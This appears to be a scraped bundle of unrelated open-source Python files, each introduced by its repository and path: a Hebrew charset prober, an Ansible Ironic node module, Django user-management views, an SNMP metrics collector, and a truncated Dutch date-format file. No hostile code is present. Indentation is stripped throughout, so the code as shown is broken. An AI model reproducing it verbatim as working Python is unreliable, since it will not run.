# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .constants import eNotMe, eDetecting
from .compat import wrap_ord
# This prober doesn't actually recognize a language or a charset.
# It is a helper prober for the use of the Hebrew model probers
### General ideas of the Hebrew charset recognition ###
#
# Four main charsets exist in Hebrew:
# "ISO-8859-8" - Visual Hebrew
# "windows-1255" - Logical Hebrew
# "ISO-8859-8-I" - Logical Hebrew
# "x-mac-hebrew" - ?? Logical Hebrew ??
#
# Both "ISO" charsets use a completely identical set of code points, whereas
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# these code points. windows-1255 defines additional characters in the range
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.
# x-mac-hebrew defines similar additional code points but with a different
# mapping.
#
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# (including final letters).
#
# The dominant difference between these charsets is their directionality.
# "Visual" directionality means that the text is ordered as if the renderer is
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# backwards. A buffer of Visual Hebrew generally looks like so:
# "[last word of first line spelled backwards] [whole line ordered backwards
# and spelled backwards] [first word of first line spelled backwards]
# [end of line] [last word of second line] ... etc' "
# adding punctuation marks, numbers and English text to visual text is
# naturally also "visual" and from left to right.
#
# "Logical" directionality means the text is ordered "naturally" according to
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# punctuation marks, numbers and English text in the text.
#
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# what little evidence I could find, it seems that its general directionality
# is Logical.
#
# To sum up all of the above, the Hebrew probing mechanism knows about two
# charsets:
# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are
# backwards while line order is natural. For charset recognition purposes
# the line order is unimportant (In fact, for this implementation, even
# word order is unimportant).
# Logical Hebrew - "windows-1255" - normal, naturally ordered text.
#
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# specifically identified.
# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew
# that contain special punctuation marks or diacritics is displayed with
# some unconverted characters showing as question marks. This problem might
# be corrected using another model prober for x-mac-hebrew. Due to the fact
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# worth the effort and performance hit.
#
#### The Prober ####
#
# The prober is divided between two SBCharSetProbers and a HebrewProber,
# all of which are managed, created, fed data, inquired and deleted by the
# SBCSGroupProber. The two SBCharSetProbers identify that the text is in
# fact some kind of Hebrew, Logical or Visual. The final decision about which
# one is it is made by the HebrewProber by combining final-letter scores
# with the scores of the two SBCharSetProbers to produce a final answer.
#
# The SBCSGroupProber is responsible for stripping the original text of HTML
# tags, English characters, numbers, low-ASCII punctuation characters, spaces
# and new lines. It reduces any sequence of such characters to a single space.
# The buffer fed to each prober in the SBCS group prober is pure text in
# high-ASCII.
# The two SBCharSetProbers (model probers) share the same language model:
# Win1255Model.
# The first SBCharSetProber uses the model normally as any other
# SBCharSetProber does, to recognize windows-1255, upon which this model was
# built. The second SBCharSetProber is told to make the pair-of-letter
# lookup in the language model backwards. This in practice exactly simulates
# a visual Hebrew model using the windows-1255 logical Hebrew model.
#
# The HebrewProber is not using any language model. All it does is look for
# final-letter evidence suggesting the text is either logical Hebrew or visual
# Hebrew. Disjointed from the model probers, the results of the HebrewProber
# alone are meaningless. HebrewProber always returns 0.00 as confidence
# since it never identifies a charset by itself. Instead, the pointer to the
# HebrewProber is passed to the model probers as a helper "Name Prober".
# When the Group prober receives a positive identification from any prober,
# it asks for the name of the charset identified. If the prober queried is a
# Hebrew model prober, the model prober forwards the call to the
# HebrewProber to make the final decision. In the HebrewProber, the
# decision is made according to the final-letters scores maintained and Both
# model probers scores. The answer is returned in the form of the name of the
# charset identified, either "windows-1255" or "ISO-8859-8".
# windows-1255 / ISO-8859-8 code points of interest
FINAL_KAF = 0xea
NORMAL_KAF = 0xeb
FINAL_MEM = 0xed
NORMAL_MEM = 0xee
FINAL_NUN = 0xef
NORMAL_NUN = 0xf0
FINAL_PE = 0xf3
NORMAL_PE = 0xf4
FINAL_TSADI = 0xf5
NORMAL_TSADI = 0xf6
# Minimum Visual vs Logical final letter score difference.
# If the difference is below this, don't rely solely on the final letter score
# distance.
MIN_FINAL_CHAR_DISTANCE = 5
# Minimum Visual vs Logical model score difference.
# If the difference is below this, don't rely at all on the model score
# distance.
MIN_MODEL_DISTANCE = 0.01
VISUAL_HEBREW_NAME = "ISO-8859-8"
LOGICAL_HEBREW_NAME = "windows-1255"
class HebrewProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mLogicalProber = None
self._mVisualProber = None
self.reset()
def reset(self):
self._mFinalCharLogicalScore = 0
self._mFinalCharVisualScore = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate
# a word delimiter at the beginning of the data
self._mPrev = ' '
self._mBeforePrev = ' '
# These probers are owned by the group prober.
def set_model_probers(self, logicalProber, visualProber):
self._mLogicalProber = logicalProber
self._mVisualProber = visualProber
def is_final(self, c):
return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE,
FINAL_TSADI]
def is_non_final(self, c):
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters
# causing the Non-Final tsadi to appear at an end of a word even
# though this is not the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being
# a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'
# for example legally end with a Non-Final Pe or Kaf. However, the
# benefit of these letters as Non-Final letters outweighs the damage
# since these words are quite rare.
return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
def feed(self, aBuf):
# Final letter analysis for logical-visual decision.
# Look for evidence that the received buffer is either logical Hebrew
# or visual Hebrew.
# The following cases are checked:
# 1) A word longer than 1 letter, ending with a final letter. This is
# an indication that the text is laid out "naturally" since the
# final letter really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In
# normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,
# should not end with the Non-Final form of that letter. Exceptions
# to this rule are mentioned above in isNonFinal(). This is an
# indication that the text is laid out backwards. +1 for visual
# score
# 3) A word longer than 1 letter, starting with a final letter. Final
# letters should not appear at the beginning of a word. This is an
# indication that the text is laid out backwards. +1 for visual
# score.
#
# The visual score and logical score are accumulated throughout the
# text and are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since
# that case is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with
# spaces) so the word boundary detection works properly. [MAP]
if self.get_state() == eNotMe:
# Both model probers say it's not them. No reason to continue.
return eNotMe
aBuf = self.filter_high_bit_only(aBuf)
for cur in aBuf:
if cur == ' ':
# We stand on a space - a word just ended
if self._mBeforePrev != ' ':
# next-to-last char was not a space so self._mPrev is not a
# 1 letter word
if self.is_final(self._mPrev):
# case (1) [-2:not space][-1:final letter][cur:space]
self._mFinalCharLogicalScore += 1
elif self.is_non_final(self._mPrev):
# case (2) [-2:not space][-1:Non-Final letter][
# cur:space]
self._mFinalCharVisualScore += 1
else:
# Not standing on a space
if ((self._mBeforePrev == ' ') and
(self.is_final(self._mPrev)) and (cur != ' ')):
# case (3) [-2:space][-1:final letter][cur:not space]
self._mFinalCharVisualScore += 1
self._mBeforePrev = self._mPrev
self._mPrev = cur
# Forever detecting, till the end or until both model probers return
# eNotMe (handled above)
return eDetecting
def get_charset_name(self):
# Make the decision: is it Logical or Visual?
# If the final letter score distance is dominant enough, rely on it.
finalsub = self._mFinalCharLogicalScore - self._mFinalCharVisualScore
if finalsub >= MIN_FINAL_CHAR_DISTANCE:
return LOGICAL_HEBREW_NAME
if finalsub <= -MIN_FINAL_CHAR_DISTANCE:
return VISUAL_HEBREW_NAME
# It's not dominant enough, try to rely on the model scores instead.
modelsub = (self._mLogicalProber.get_confidence()
- self._mVisualProber.get_confidence())
if modelsub > MIN_MODEL_DISTANCE:
return LOGICAL_HEBREW_NAME
if modelsub < -MIN_MODEL_DISTANCE:
return VISUAL_HEBREW_NAME
# Still no good, back to final letter distance, maybe it'll save the
# day.
if finalsub < 0.0:
return VISUAL_HEBREW_NAME
# (finalsub > 0 - Logical) or (don't know what to do) default to
# Logical.
return LOGICAL_HEBREW_NAME
def get_state(self):
# Remain active as long as any of the model probers are active.
if (self._mLogicalProber.get_state() == eNotMe) and \
(self._mVisualProber.get_state() == eNotMe):
return eNotMe
return eDetecting
|
kennethgillen/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/openstack/os_ironic_node.py
|
49
|
#!/usr/bin/python
# coding: utf-8 -*-
# (c) 2015, Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_ironic_node
short_description: Activate/Deactivate Bare Metal Resources from OpenStack
author: "Monty Taylor (@emonty)"
extends_documentation_fragment: openstack
version_added: "2.0"
description:
- Deploy to nodes controlled by Ironic.
options:
state:
description:
- Indicates desired state of the resource
choices: ['present', 'absent']
default: present
deploy:
description:
- Indicates if the resource should be deployed. Allows for deployment
logic to be disengaged and control of the node power or maintenance
state to be changed.
choices: ['true', 'false']
default: true
uuid:
description:
- globally unique identifier (UUID) to be given to the resource.
required: false
default: None
ironic_url:
description:
- If noauth mode is utilized, this is required to be set to the
endpoint URL for the Ironic API. Use with "auth" and "auth_type"
settings set to None.
required: false
default: None
config_drive:
description:
- A configdrive file or HTTP(S) URL that will be passed along to the
node.
required: false
default: None
instance_info:
description:
- Definition of the instance information which is used to deploy
the node. This information is only required when an instance is
set to present.
suboptions:
image_source:
description:
- An HTTP(S) URL where the image can be retrieved from.
image_checksum:
description:
- The checksum of image_source.
image_disk_format:
description:
- The type of image that has been requested to be deployed.
power:
description:
- A setting to allow power state to be asserted allowing nodes
that are not yet deployed to be powered on, and nodes that
are deployed to be powered off.
choices: ['present', 'absent']
default: present
maintenance:
description:
- A setting to allow the direct control if a node is in
maintenance mode.
required: false
default: false
maintenance_reason:
description:
- A string expression regarding the reason a node is in a
maintenance mode.
required: false
default: None
wait:
description:
- A boolean value instructing the module to wait for node
activation or deactivation to complete before returning.
required: false
default: False
version_added: "2.1"
timeout:
description:
- An integer value representing the number of seconds to
wait for the node activation or deactivation to complete.
version_added: "2.1"
availability_zone:
description:
- Ignored. Present for backwards compatability
required: false
'''
EXAMPLES = '''
# Activate a node by booting an image with a configdrive attached
os_ironic_node:
cloud: "openstack"
uuid: "d44666e1-35b3-4f6b-acb0-88ab7052da69"
state: present
power: present
deploy: True
maintenance: False
config_drive: "http://192.168.1.1/host-configdrive.iso"
instance_info:
image_source: "http://192.168.1.1/deploy_image.img"
image_checksum: "356a6b55ecc511a20c33c946c4e678af"
image_disk_format: "qcow"
delegate_to: localhost
'''
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
from distutils.version import StrictVersion
def _choose_id_value(module):
if module.params['uuid']:
return module.params['uuid']
if module.params['name']:
return module.params['name']
return None
# TODO(TheJulia): Change this over to use the machine patch method
# in shade once it is available.
def _prepare_instance_info_patch(instance_info):
patch = []
patch.append({
'op': 'replace',
'path': '/instance_info',
'value': instance_info
})
return patch
def _is_true(value):
true_values = [True, 'yes', 'Yes', 'True', 'true', 'present', 'on']
if value in true_values:
return True
return False
def _is_false(value):
false_values = [False, None, 'no', 'No', 'False', 'false', 'absent', 'off']
if value in false_values:
return True
return False
def _check_set_maintenance(module, cloud, node):
if _is_true(module.params['maintenance']):
if _is_false(node['maintenance']):
cloud.set_machine_maintenance_state(
node['uuid'],
True,
reason=module.params['maintenance_reason'])
module.exit_json(changed=True, msg="Node has been set into "
"maintenance mode")
else:
# User has requested maintenance state, node is already in the
# desired state, checking to see if the reason has changed.
if (str(node['maintenance_reason']) not in
str(module.params['maintenance_reason'])):
cloud.set_machine_maintenance_state(
node['uuid'],
True,
reason=module.params['maintenance_reason'])
module.exit_json(changed=True, msg="Node maintenance reason "
"updated, cannot take any "
"additional action.")
elif _is_false(module.params['maintenance']):
if node['maintenance'] is True:
cloud.remove_machine_from_maintenance(node['uuid'])
return True
else:
module.fail_json(msg="maintenance parameter was set but a valid "
"the value was not recognized.")
return False
def _check_set_power_state(module, cloud, node):
if 'power on' in str(node['power_state']):
if _is_false(module.params['power']):
# User has requested the node be powered off.
cloud.set_machine_power_off(node['uuid'])
module.exit_json(changed=True, msg="Power requested off")
if 'power off' in str(node['power_state']):
if (_is_false(module.params['power']) and
_is_false(module.params['state'])):
return False
if (_is_false(module.params['power']) and
_is_false(module.params['state'])):
module.exit_json(
changed=False,
msg="Power for node is %s, node must be reactivated "
"OR set to state absent"
)
# In the event the power has been toggled on and
# deployment has been requested, we need to skip this
# step.
if (_is_true(module.params['power']) and
_is_false(module.params['deploy'])):
# Node is powered down when it is not awaiting to be provisioned
cloud.set_machine_power_on(node['uuid'])
return True
# Default False if no action has been taken.
return False
def main():
argument_spec = openstack_full_argument_spec(
uuid=dict(required=False),
name=dict(required=False),
instance_info=dict(type='dict', required=False),
config_drive=dict(required=False),
ironic_url=dict(required=False),
state=dict(required=False, default='present'),
maintenance=dict(required=False),
maintenance_reason=dict(required=False),
power=dict(required=False, default='present'),
deploy=dict(required=False, default=True),
wait=dict(type='bool', required=False, default=False),
timeout=dict(required=False, type='int', default=1800),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
if (module.params['wait'] and
StrictVersion(shade.__version__) < StrictVersion('1.4.0')):
module.fail_json(msg="To utilize wait, the installed version of"
"the shade library MUST be >=1.4.0")
if (module.params['auth_type'] in [None, 'None'] and
module.params['ironic_url'] is None):
module.fail_json(msg="Authentication appears disabled, Please "
"define an ironic_url parameter")
if (module.params['ironic_url'] and
module.params['auth_type'] in [None, 'None']):
module.params['auth'] = dict(
endpoint=module.params['ironic_url']
)
node_id = _choose_id_value(module)
if not node_id:
module.fail_json(msg="A uuid or name value must be defined "
"to use this module.")
try:
cloud = shade.operator_cloud(**module.params)
node = cloud.get_machine(node_id)
if node is None:
module.fail_json(msg="node not found")
uuid = node['uuid']
instance_info = module.params['instance_info']
changed = False
wait = module.params['wait']
timeout = module.params['timeout']
# User has reqeusted desired state to be in maintenance state.
if module.params['state'] is 'maintenance':
module.params['maintenance'] = True
if node['provision_state'] in [
'cleaning',
'deleting',
'wait call-back']:
module.fail_json(msg="Node is in %s state, cannot act upon the "
"request as the node is in a transition "
"state" % node['provision_state'])
# TODO(TheJulia) This is in-development code, that requires
# code in the shade library that is still in development.
if _check_set_maintenance(module, cloud, node):
if node['provision_state'] in 'active':
module.exit_json(changed=True,
result="Maintenance state changed")
changed = True
node = cloud.get_machine(node_id)
if _check_set_power_state(module, cloud, node):
changed = True
node = cloud.get_machine(node_id)
if _is_true(module.params['state']):
if _is_false(module.params['deploy']):
module.exit_json(
changed=changed,
result="User request has explicitly disabled "
"deployment logic"
)
if 'active' in node['provision_state']:
module.exit_json(
changed=changed,
result="Node already in an active state."
)
if instance_info is None:
module.fail_json(
changed=changed,
msg="When setting an instance to present, "
"instance_info is a required variable.")
# TODO(TheJulia): Update instance info, however info is
# deployment specific. Perhaps consider adding rebuild
# support, although there is a known desire to remove
# rebuild support from Ironic at some point in the future.
patch = _prepare_instance_info_patch(instance_info)
cloud.set_node_instance_info(uuid, patch)
cloud.validate_node(uuid)
if not wait:
cloud.activate_node(uuid, module.params['config_drive'])
else:
cloud.activate_node(
uuid,
configdrive=module.params['config_drive'],
wait=wait,
timeout=timeout)
# TODO(TheJulia): Add more error checking..
module.exit_json(changed=changed, result="node activated")
elif _is_false(module.params['state']):
if node['provision_state'] not in "deleted":
cloud.purge_node_instance_info(uuid)
if not wait:
cloud.deactivate_node(uuid)
else:
cloud.deactivate_node(
uuid,
wait=wait,
timeout=timeout)
module.exit_json(changed=True, result="deleted")
else:
module.exit_json(changed=False, result="node not found")
else:
module.fail_json(msg="State must be present, absent, "
"maintenance, off")
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == "__main__":
main()
|
Karaage-Cluster/karaage
|
refs/heads/master
|
karaage/people/views/persons.py
|
2
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import datetime
import django_tables2 as tables
import six
from django.contrib import messages
from django.contrib.auth import views
from django.http import (
HttpResponseBadRequest,
HttpResponseForbidden,
HttpResponseRedirect,
QueryDict,
)
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views.decorators.debug import sensitive_post_parameters
import karaage.common as common
from karaage.common.decorators import admin_required, login_required
from karaage.institutes.tables import InstituteTable
from karaage.people.emails import (
send_bounced_warning,
send_reset_password_email,
)
from karaage.people.forms import (
AddPersonForm,
AdminPasswordChangeForm,
AdminPersonForm,
SetPasswordForm,
)
from karaage.people.models import Person
from karaage.people.tables import LeaderTable, PersonFilter, PersonTable
from karaage.projects.models import Project
from karaage.projects.tables import ProjectTable
def _add_edit_user(request, form_class, username):
person_form = form_class
if username is None:
person = None
else:
person = get_object_or_404(Person, username=username)
form = person_form(request.POST or None, instance=person)
if request.method == 'POST':
if form.is_valid():
if person:
# edit
person = form.save()
messages.success(
request, "User '%s' was edited succesfully" % person)
assert person is not None
else:
# add
person = form.save()
messages.success(
request, "User '%s' was created succesfully" % person)
assert person is not None
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_form.html',
context={'person': person, 'form': form},
request=request)
@sensitive_post_parameters('password1', 'password2')
@admin_required
def add_user(request):
return _add_edit_user(request, AddPersonForm, None)
@admin_required
def edit_user(request, username):
return _add_edit_user(request, AdminPersonForm, username)
@login_required
def user_list(request, queryset=None, title=None):
if queryset is None:
queryset = Person.objects.all()
if not common.is_admin(request):
queryset = queryset.filter(pk=request.user.pk)
queryset = queryset.select_related()
q_filter = PersonFilter(request.GET, queryset=queryset)
table = PersonTable(q_filter.qs)
tables.RequestConfig(request).configure(table)
spec = []
for name, value in six.iteritems(q_filter.form.cleaned_data):
if value is not None and value != "":
name = name.replace('_', ' ').capitalize()
spec.append((name, value))
context = {
'table': table,
'filter': q_filter,
'spec': spec,
'title': title or "Person list",
}
return render(
template_name="karaage/people/person_list.html", context=context,
request=request)
@admin_required
def locked_list(request):
result = QueryDict("", mutable=True)
result['active'] = "locked"
url = reverse('kg_person_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
@admin_required
def struggling(request):
today = datetime.date.today()
days30 = today - datetime.timedelta(days=30)
result = QueryDict("", mutable=True)
result['active'] = "yes"
result['begin_date_approved'] = days30
result['no_last_usage'] = True
result['sort'] = "-date_approved"
url = reverse('kg_person_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
@admin_required
def delete_user(request, username):
person = get_object_or_404(Person, username=username)
if request.method == 'POST':
deleted_by = request.user
person.deactivate(deleted_by)
messages.success(request, "User '%s' was deleted succesfully" % person)
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_confirm_delete.html',
context=locals(),
request=request)
@login_required
def user_detail(request, username):
config = tables.RequestConfig(request, paginate={"per_page": 5})
person = get_object_or_404(Person, username=username)
if not person.can_view(request):
return HttpResponseForbidden(
'<h1>Access Denied</h1>'
'<p>You do not have permission to view details '
'about this person.</p>')
leader_project_list = Project.objects.filter(
leaders=person, is_active=True)
leader_project_list = ProjectTable(
leader_project_list, prefix="leader-")
config.configure(leader_project_list)
delegate_institute_list = person.delegate_for.all()
delegate_institute_list = delegate_institute_list.select_related()
delegate_institute_list = InstituteTable(
delegate_institute_list, prefix="delegate")
config.configure(delegate_institute_list)
return render(
template_name='karaage/people/person_detail.html', context=locals(),
request=request)
@admin_required
def user_verbose(request, username):
person = get_object_or_404(Person, username=username)
from karaage.datastores import get_account_details
account_details = {}
for ua in person.account_set.filter(date_deleted__isnull=True):
details = get_account_details(ua)
account_details[ua] = details
return render(
template_name='karaage/people/person_verbose.html', context=locals(),
request=request)
@admin_required
def activate(request, username):
person = get_object_or_404(Person, username=username)
if person.is_active:
return HttpResponseBadRequest("<h1>Bad Request</h1>")
if request.method == 'POST':
approved_by = request.user
person.activate(approved_by)
return HttpResponseRedirect(
reverse('kg_person_password', args=[person.username]))
return render(
template_name='karaage/people/person_reactivate.html',
context={'person': person},
request=request)
@sensitive_post_parameters('new1', 'new2')
@admin_required
def password_change(request, username):
person = get_object_or_404(Person, username=username)
if request.POST:
form = AdminPasswordChangeForm(data=request.POST, person=person)
if form.is_valid():
form.save()
messages.success(request, "Password changed successfully")
if person.is_locked():
person.unlock()
return HttpResponseRedirect(person.get_absolute_url())
else:
form = AdminPasswordChangeForm(person=person)
return render(
template_name='karaage/people/person_password.html',
context={'person': person, 'form': form},
request=request)
@admin_required
def lock_person(request, username):
person = get_object_or_404(Person, username=username)
if request.method == 'POST':
person.lock()
messages.success(request, "%s's account has been locked" % person)
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_confirm_lock.html',
context=locals(),
request=request)
@admin_required
def unlock_person(request, username):
person = get_object_or_404(Person, username=username)
if request.method == 'POST':
person.unlock()
messages.success(request, "%s's account has been unlocked" % person)
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_confirm_unlock.html',
context=locals(),
request=request)
@admin_required
def bounced_email(request, username):
person = get_object_or_404(Person, username=username)
leader_list = []
for project in person.projects.filter(is_active=True):
for leader in project.leaders.filter(
is_active=True, login_enabled=True):
leader_list.append({'project': project, 'leader': leader})
if request.method == 'POST':
person.lock()
send_bounced_warning(person, leader_list)
messages.success(
request,
"%s's account has been locked and emails have been sent" % person)
common.log.change(
person,
'Emails sent to project leaders and account locked')
return HttpResponseRedirect(person.get_absolute_url())
leader_list = LeaderTable(leader_list)
tables.RequestConfig(request).configure(leader_list)
return render(
template_name='karaage/people/person_bounced_email.html',
context=locals(),
request=request)
@admin_required
def person_logs(request, username):
obj = get_object_or_404(Person, username=username)
breadcrumbs = [
("People", reverse("kg_person_list")),
(six.text_type(obj), reverse("kg_person_detail", args=[obj.username]))
]
return common.log_list(request, breadcrumbs, obj)
@admin_required
def add_comment(request, username):
obj = get_object_or_404(Person, username=username)
breadcrumbs = [
("People", reverse("kg_person_list")),
(six.text_type(obj), reverse("kg_person_detail", args=[obj.username]))
]
return common.add_comment(request, breadcrumbs, obj)
@login_required
def password_request(request, username):
person = get_object_or_404(Person, username=username)
error = None
post_reset_redirect = reverse(
'kg_person_reset_done', args=[person.username])
if not person.can_view(request):
return HttpResponseForbidden(
'<h1>Access Denied</h1>'
'<p>You do not have permission to view details '
'about this user.</p>')
elif not person.is_active:
error = "Person '%s' is deleted." % person.username
elif not person.login_enabled:
error = "Person '%s' is locked." % person.username
elif request.method == "POST":
send_reset_password_email(person)
return HttpResponseRedirect(post_reset_redirect)
var = {
'person': person,
'error': error,
}
return render(
template_name='karaage/people/person_password_request.html',
context=var,
request=request)
@login_required
def password_request_done(request, username):
person = get_object_or_404(Person, username=username)
if not person.can_view(request):
return HttpResponseForbidden(
'<h1>Access Denied</h1>'
'<p>You do not have permission to view details '
'about this user.</p>')
var = {
'person': person,
}
return render(
template_name='karaage/people/person_password_request_done.html',
context=var,
request=request)
class PasswordResetConfirmView(views.PasswordResetConfirmView):
form_class = SetPasswordForm
template_name = 'karaage/people/person_reset_confirm.html'
class PasswordResetCompleteView(views.PasswordResetCompleteView):
template_name = 'karaage/people/person_reset_complete.html'
|
pcostell/apitools
|
refs/heads/master
|
samples/servicemanagement_sample/servicemanagement_v1/__init__.py
|
415
|
"""Package marker file."""
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
|
python-diamond/Diamond
|
refs/heads/master
|
src/collectors/snmp/snmp.py
|
3
|
# coding=utf-8
"""
SNMPCollector is a special collector for collecting data by using SNMP
#### Dependencies
* pysnmp
"""
import socket
import warnings
# pysnmp packages on debian 6.0 use sha and md5 which are deprecated
# packages. there is nothing to be done about it until pysnmp
# updates to use new hashlib module -- ignoring warning for now
old_showwarning = warnings.showwarning
warnings.filterwarnings("ignore", category=DeprecationWarning)
cmdgen = None
try:
import pysnmp.entity.rfc3413.oneliner.cmdgen as cmdgen
import pysnmp.debug
except ImportError:
pysnmp = None
cmdgen = None
warnings.showwarning = old_showwarning
import diamond.collector
class SNMPCollector(diamond.collector.Collector):
def __init__(self, *args, **kwargs):
super(SNMPCollector, self).__init__(*args, **kwargs)
if cmdgen is not None:
self.snmpCmdGen = cmdgen.CommandGenerator()
def get_default_config_help(self):
config_help = super(SNMPCollector, self).get_default_config_help()
config_help.update({
'timeout': 'Seconds before timing out the snmp connection',
'retries': 'Number of times to retry before bailing',
})
return config_help
def get_default_config(self):
# Initialize default config
default_config = super(SNMPCollector, self).get_default_config()
default_config['path_suffix'] = ''
default_config['path_prefix'] = 'systems'
default_config['timeout'] = 5
default_config['retries'] = 3
# Return default config
return default_config
def _convert_to_oid(self, s):
d = s.split(".")
return tuple([int(x) for x in d])
def _convert_from_oid(self, oid):
return ".".join([str(x) for x in oid])
def collect(self):
for device in self.config['devices']:
host = self.config['devices'][device]['host']
port = self.config['devices'][device]['port']
community = self.config['devices'][device]['community']
self.collect_snmp(device, host, port, community)
def get(self, oid, host, port, community):
"""
Perform SNMP get for a given OID
"""
# Initialize return value
ret = {}
# Convert OID to tuple if necessary
if not isinstance(oid, tuple):
oid = self._convert_to_oid(oid)
# Convert Host to IP if necessary
host = socket.gethostbyname(host)
# Assemble SNMP Auth Data
snmpAuthData = cmdgen.CommunityData(
'agent-{}'.format(community),
community)
# Assemble SNMP Transport Data
snmpTransportData = cmdgen.UdpTransportTarget(
(host, port),
int(self.config['timeout']),
int(self.config['retries']))
# Assemble SNMP Next Command
result = self.snmpCmdGen.getCmd(snmpAuthData, snmpTransportData, oid)
varBind = result[3]
# TODO: Error check
for o, v in varBind:
ret[str(o)] = v.prettyPrint()
return ret
def walk(self, oid, host, port, community):
"""
Perform an SNMP walk on a given OID
"""
# Initialize return value
ret = {}
# Convert OID to tuple if necessary
if not isinstance(oid, tuple):
oid = self._convert_to_oid(oid)
# Convert Host to IP if necessary
host = socket.gethostbyname(host)
# Assemble SNMP Auth Data
snmpAuthData = cmdgen.CommunityData(
'agent-{}'.format(community),
community)
# Assemble SNMP Transport Data
snmpTransportData = cmdgen.UdpTransportTarget(
(host, port),
int(self.config['timeout']),
int(self.config['retries']))
# Assemble SNMP Next Command
resultTable = self.snmpCmdGen.nextCmd(snmpAuthData,
snmpTransportData,
oid)
varBindTable = resultTable[3]
# TODO: Error Check
for varBindTableRow in varBindTable:
for o, v in varBindTableRow:
ret[str(o)] = v.prettyPrint()
return ret
|
AnhellO/DAS_Sistemas
|
refs/heads/development
|
Ago-Dic-2017/Enrique Castillo/Ordinario/test/Lib/site-packages/django/conf/locale/nl/formats.py
|
65
|
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d-%m-%Y', '%d-%m-%y', # '20-01-2009', '20-01-09'
'%d/%m/%Y', '%d/%m/%y', # '20/01/2009', '20/01/09'
